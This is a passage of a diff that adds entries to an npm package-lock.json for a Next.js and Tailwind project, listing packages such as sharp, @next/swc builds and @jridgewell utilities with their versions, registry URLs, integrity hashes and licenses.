"sha512-43/qtrDUokr7LJqoF2c3+RInu/t4zfrpYdoSDfYyhg52rwLV6TnOvdG4fXm7IkSB3wErkcmJS9iEhjVtOSEjjA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@eslint/core": "^0.17.0", + "levn": "^0.4.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@humanfs/core": { + "version": "0.19.2", + "resolved": "https://registry.npmjs.org/@humanfs/core/-/core-0.19.2.tgz", + "integrity": "sha512-UhXNm+CFMWcbChXywFwkmhqjs3PRCmcSa/hfBgLIb7oQ5HNb1wS0icWsGtSAUNgefHeI+eBrA8I1fxmbHsGdvA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@humanfs/types": "^0.15.0" + }, + "engines": { + "node": ">=18.18.0" + } + }, + "node_modules/@humanfs/node": { + "version": "0.16.8", + "resolved": "https://registry.npmjs.org/@humanfs/node/-/node-0.16.8.tgz", + "integrity": "sha512-gE1eQNZ3R++kTzFUpdGlpmy8kDZD/MLyHqDwqjkVQI0JMdI1D51sy1H958PNXYkM2rAac7e5/CnIKZrHtPh3BQ==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@humanfs/core": "^0.19.2", + "@humanfs/types": "^0.15.0", + "@humanwhocodes/retry": "^0.4.0" + }, + "engines": { + "node": ">=18.18.0" + } + }, + "node_modules/@humanfs/types": { + "version": "0.15.0", + "resolved": "https://registry.npmjs.org/@humanfs/types/-/types-0.15.0.tgz", + "integrity": "sha512-ZZ1w0aoQkwuUuC7Yf+7sdeaNfqQiiLcSRbfI08oAxqLtpXQr9AIVX7Ay7HLDuiLYAaFPu8oBYNq/QIi9URHJ3Q==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=18.18.0" + } + }, + "node_modules/@humanwhocodes/module-importer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", + "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=12.22" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + "node_modules/@humanwhocodes/retry": { + "version": "0.4.3", + "resolved": "https://registry.npmjs.org/@humanwhocodes/retry/-/retry-0.4.3.tgz", + "integrity": "sha512-bV0Tgo9K4hfPCek+aMAn81RppFKv2ySDQeMoSZuvTASywNTnVJCArCZE2FWqpvIatKu7VMRLWlR1EazvVhDyhQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=18.18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + "node_modules/@img/colour": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz", + "integrity": "sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==", + "license": "MIT", + "optional": true, + "engines": { + "node": ">=18" + } + }, + "node_modules/@img/sharp-darwin-arm64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz", + "integrity": "sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==", + "cpu": [ + "arm64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-darwin-arm64": "1.2.4" + } + }, + "node_modules/@img/sharp-darwin-x64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz", + "integrity": "sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==", + "cpu": [ + "x64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-darwin-x64": "1.2.4" + } + }, + "node_modules/@img/sharp-libvips-darwin-arm64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz", + "integrity": "sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==", + "cpu": [ + "arm64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "darwin" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-darwin-x64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz", + "integrity": "sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==", + "cpu": [ + "x64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "darwin" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-arm": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz", + "integrity": "sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==", + "cpu": [ + "arm" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-arm64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz", + "integrity": "sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==", + "cpu": [ + "arm64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-ppc64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz", + "integrity": "sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==", + "cpu": [ + "ppc64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-riscv64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz", + "integrity": "sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==", + "cpu": [ + "riscv64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-s390x": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz", + "integrity": "sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==", + "cpu": [ + "s390x" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linux-x64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz", + "integrity": "sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==", + "cpu": [ + "x64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linuxmusl-arm64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz", + "integrity": "sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==", + "cpu": [ + "arm64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-libvips-linuxmusl-x64": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz", + "integrity": "sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==", + "cpu": [ + "x64" + ], + "license": "LGPL-3.0-or-later", + "optional": true, + "os": [ + "linux" + ], + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-linux-arm": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz", + "integrity": "sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==", + "cpu": [ + "arm" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-arm": "1.2.4" + } + }, + "node_modules/@img/sharp-linux-arm64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz", + "integrity": "sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==", + "cpu": [ + "arm64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-arm64": "1.2.4" + } + }, + "node_modules/@img/sharp-linux-ppc64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz", + "integrity": "sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==", + "cpu": [ + "ppc64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-ppc64": "1.2.4" + } + }, + "node_modules/@img/sharp-linux-riscv64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz", + "integrity": "sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==", + "cpu": [ + "riscv64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-riscv64": "1.2.4" + } + }, + "node_modules/@img/sharp-linux-s390x": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz", + "integrity": "sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==", + "cpu": [ + "s390x" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-s390x": "1.2.4" + } + }, + "node_modules/@img/sharp-linux-x64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz", + "integrity": "sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==", + "cpu": [ + "x64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linux-x64": "1.2.4" + } + }, + "node_modules/@img/sharp-linuxmusl-arm64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz", + "integrity": "sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==", + "cpu": [ + "arm64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linuxmusl-arm64": "1.2.4" + } + }, + "node_modules/@img/sharp-linuxmusl-x64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz", + "integrity": "sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==", + "cpu": [ + "x64" + ], + "license": "Apache-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-libvips-linuxmusl-x64": "1.2.4" + } + }, + "node_modules/@img/sharp-wasm32": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz", + "integrity": "sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==", + "cpu": [ + "wasm32" + ], + "license": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", + "optional": true, + "dependencies": { + "@emnapi/runtime": "^1.7.0" + }, + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-win32-arm64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz", + "integrity": "sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==", + "cpu": [ + "arm64" + ], + "license": "Apache-2.0 AND LGPL-3.0-or-later", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-win32-ia32": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz", + "integrity": "sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==", + "cpu": [ + "ia32" + ], + "license": "Apache-2.0 AND LGPL-3.0-or-later", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@img/sharp-win32-x64": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz", + "integrity": "sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==", + "cpu": [ + "x64" + ], + "license": "Apache-2.0 AND LGPL-3.0-or-later", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + } + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.13", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", + "integrity": "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/remapping": { + "version": "2.3.5", + "resolved": "https://registry.npmjs.org/@jridgewell/remapping/-/remapping-2.3.5.tgz", + "integrity": "sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", + "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.5.5", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz", + "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==", + "dev": true, + "license": "MIT" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.31", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz", + "integrity": "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@napi-rs/wasm-runtime": { + "version": "0.2.12", + "resolved": "https://registry.npmjs.org/@napi-rs/wasm-runtime/-/wasm-runtime-0.2.12.tgz", + "integrity": "sha512-ZVWUcfwY4E/yPitQJl481FjFo3K22D6qF0DuFH6Y/nbnE11GY5uguDxZMGXPQ8WQ0128MXQD7TnfHyK4oWoIJQ==", + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "@emnapi/core": "^1.4.3", + "@emnapi/runtime": "^1.4.3", + "@tybys/wasm-util": "^0.10.0" + } + }, + "node_modules/@next/env": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/env/-/env-15.5.15.tgz", + "integrity": "sha512-vcmyu5/MyFzN7CdqRHO3uHO44p/QPCZkuTUXroeUmhNP8bL5PHFEhik22JUazt+CDDoD6EpBYRCaS2pISL+/hg==", + "license": "MIT" + }, + "node_modules/@next/eslint-plugin-next": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/eslint-plugin-next/-/eslint-plugin-next-15.5.15.tgz", + "integrity": "sha512-ExQoBfyKMjAUQ2nuF39ryQsG26H374ZfH13dlOZqf6TaE9ycRbIm+qUbUFCliU4BtQhiqtS7cnGA1yWfPMQ+jA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-glob": "3.3.1" + } + }, + "node_modules/@next/swc-darwin-arm64": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-15.5.15.tgz", + "integrity": "sha512-6PvFO2Tzt10GFK2Ro9tAVEtacMqRmTarYMFKAnV2vYMdwWc73xzmDQyAV7SwEdMhzmiRoo7+m88DuiXlJlGeaw==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-darwin-x64": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-15.5.15.tgz", + "integrity": "sha512-G+YNV+z6FDZTp/+IdGyIMFqalBTaQSnvAA+X/hrt+eaTRFSznRMz9K7rTmzvM6tDmKegNtyzgufZW0HwVzEqaQ==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-linux-arm64-gnu": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-15.5.15.tgz", + "integrity": "sha512-eVkrMcVIBqGfXB+QUC7jjZ94Z6uX/dNStbQFabewAnk13Uy18Igd1YZ/GtPRzdhtm7QwC0e6o7zOQecul4iC1w==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-linux-arm64-musl": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-15.5.15.tgz", + "integrity": "sha512-RwSHKMQ7InLy5GfkY2/n5PcFycKA08qI1VST78n09nN36nUPqCvGSMiLXlfUmzmpQpF6XeBYP2KRWHi0UW3uNg==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-linux-x64-gnu": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-15.5.15.tgz", + "integrity": "sha512-nplqvY86LakS+eeiuWsNWvfmK8pFcOEW7ZtVRt4QH70lL+0x6LG/m1OpJ/tvrbwjmR8HH9/fH2jzW1GlL03TIg==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-linux-x64-musl": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-15.5.15.tgz", + "integrity": "sha512-eAgl9NKQ84/sww0v81DQINl/vL2IBxD7sMybd0cWRw6wqgouVI53brVRBrggqBRP/NWeIAE1dm5cbKYoiMlqDQ==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-win32-arm64-msvc": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-15.5.15.tgz", + "integrity": "sha512-GJVZC86lzSquh0MtvZT+L7G8+jMnJcldloOjA8Kf3wXvBrvb6OGe2MzPuALxFshSm/IpwUtD2mIoof39ymf52A==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@next/swc-win32-x64-msvc": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-15.5.15.tgz", + "integrity": "sha512-nFucjVdwlFqxh/JG3hWSJ4p8+YJV7Ii8aPDuBQULB6DzUF4UNZETXLfEUk+oI2zEznWWULPt7MeuTE6xtK1HSA==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@nodelib/fs.scandir": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.stat": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.walk": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nolyfill/is-core-module": { + "version": "1.0.39", + "resolved": "https://registry.npmjs.org/@nolyfill/is-core-module/-/is-core-module-1.0.39.tgz", + "integrity": "sha512-nn5ozdjYQpUCZlWGuxcJY/KpxkWQs4DcbMCmKojjyrYDEAGy4Ce19NN4v5MduafTwJlbKc99UA8YhSVqq9yPZA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.4.0" + } + }, + "node_modules/@rtsao/scc": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@rtsao/scc/-/scc-1.1.0.tgz", + "integrity": "sha512-zt6OdqaDoOnJ1ZYsCYGt9YmWzDXl4vQdKTyJev62gFhRGKdx7mcT54V9KIjg+d2wi9EXsPvAPKe7i7WjfVWB8g==", + "dev": true, + "license": "MIT" + }, + "node_modules/@rushstack/eslint-patch": { + "version": "1.16.1", + "resolved": "https://registry.npmjs.org/@rushstack/eslint-patch/-/eslint-patch-1.16.1.tgz", + "integrity": "sha512-TvZbIpeKqGQQ7X0zSCvPH9riMSFQFSggnfBjFZ1mEoILW+UuXCKwOoPcgjMwiUtRqFZ8jWhPJc4um14vC6I4ag==", + "dev": true, + "license": "MIT" + }, + "node_modules/@swc/helpers": { + "version": "0.5.15", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.15.tgz", + "integrity": "sha512-JQ5TuMi45Owi4/BIMAJBoSQoOJu12oOk/gADqlcUL9JEdHB8vyjUSsxqeNXnmXHjYKMi2WcYtezGEEhqUI/E2g==", + "license": "Apache-2.0", + "dependencies": { + "tslib": "^2.8.0" + } + }, + "node_modules/@tailwindcss/node": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/@tailwindcss/node/-/node-4.2.4.tgz", + "integrity": "sha512-Ai7+yQPxz3ddrDQzFfBKdHEVBg0w3Zl83jnjuwxnZOsnH9pGn93QHQtpU0p/8rYWxvbFZHneni6p1BSLK4DkGA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/remapping": "^2.3.5", + "enhanced-resolve": "^5.19.0", + "jiti": "^2.6.1", + "lightningcss": "1.32.0", + "magic-string": "^0.30.21", + "source-map-js": "^1.2.1", + "tailwindcss": "4.2.4" + } + }, + "node_modules/@tailwindcss/oxide": { + "version": "4.2.4", + 